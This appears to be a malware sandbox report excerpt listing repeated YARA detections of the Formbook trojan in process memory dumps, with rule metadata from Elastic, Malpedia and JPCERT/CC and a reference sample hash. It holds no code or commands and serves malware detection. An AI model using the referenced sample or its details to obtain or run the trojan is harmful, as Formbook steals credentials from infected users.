              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000011.00000002.2649074855.0000000010EA2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
